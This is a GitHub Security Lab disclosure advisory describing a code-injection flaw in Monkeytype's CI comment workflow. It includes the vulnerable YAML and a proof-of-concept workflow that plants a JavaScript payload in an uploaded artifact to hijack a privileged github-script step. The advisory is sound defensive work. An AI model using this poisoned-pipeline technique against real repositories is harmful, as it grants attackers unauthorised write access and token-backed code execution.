Coordinated Disclosure Timeline

Summary

Monkeytype is vulnerable to Poisoned Pipeline Execution through Code Injection in its ci-failure-comment.yml GitHub Workflow, enabling attackers to gain pull-requests write access.

Project

monkeytype

Tested Version

Latest commit at the time of reporting

Details

Code Injection in ci-failure-comment.yml (GHSL-2024-167)

The ci-failure-comment.yml workflow is triggered when the Monkey CI workflow completes:

on:
  workflow_run:
    workflows: [Monkey CI]
    types: [completed]

When it runs, it downloads the artifacts uploaded by the triggering Monkey CI run (the download step is given the run_id and no artifact name, so each artifact lands in a directory named after it) and assigns the contents of ./pr_num/pr_num.txt to the steps.pr_num_reader.outputs.content workflow variable:

- name: Download workflow artifact
  uses: dawidd6/action-download-artifact@v2.11.0
  with:
    github_token: ${{ secrets.GITHUB_TOKEN }}
    workflow: peek_icons.yml
    run_id: ${{ github.event.workflow_run.id }}

- name: Read the pr_num file
  id: pr_num_reader
  uses: juliangruber/read-file-action@v1.0.0
  with:
    path: ./pr_num/pr_num.txt

The artifact is produced by the triggering Monkey CI run, which executes on pull_request events and therefore on the contents of a pull request from a fork, so its content is attacker-controlled. The workflow never validates that the variable is actually a number, and it later interpolates the value directly into the JavaScript passed to actions/github-script. Since ${{ }} expressions are substituted into the script text before it is executed, an attacker can change the code that runs:

- name: Create comment
  uses: actions/github-script@v6
  with:
    github-token: ${{ secrets.API_TOKEN }}
    script: |
      github.rest.issues.createComment({
        issue_number: ${{ steps.pr_num_reader.outputs.content }},
        owner: context.repo.owner,
        repo: context.repo.repo,
        body: 'Continuous integration check(s) failed. Please review the failing check\'s logs and make the necessary changes. ' + context.payload.workflow_run.html_url
      })

Proof Of Concept

name: Monkey CI

on:
  pull_request:

jobs:
  exploit:
    permissions: write-all
    runs-on: ubuntu-latest
    steps:
      - name: Write exploit to artifact
        shell: bash
        # Outer single quotes keep the backticks and ${...} literal for bash; the
        # JS string inside uses double quotes so the payload reaches the artifact intact.
        run: echo '`${console.log("PWNED")}`' > pr_num.txt

      - name: Upload the exploit
        uses: actions/upload-artifact@v3
        with:
          name: pr_num
          path: ./pr_num.txt

Impact

An attacker who opens a pull request from a fork can run arbitrary JavaScript in the privileged ci-failure-comment.yml workflow, in the github-script step that is authenticated with the API_TOKEN secret. This issue therefore leads to pull-requests write access.

Resources

CVE

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-167 in any communication regarding this issue.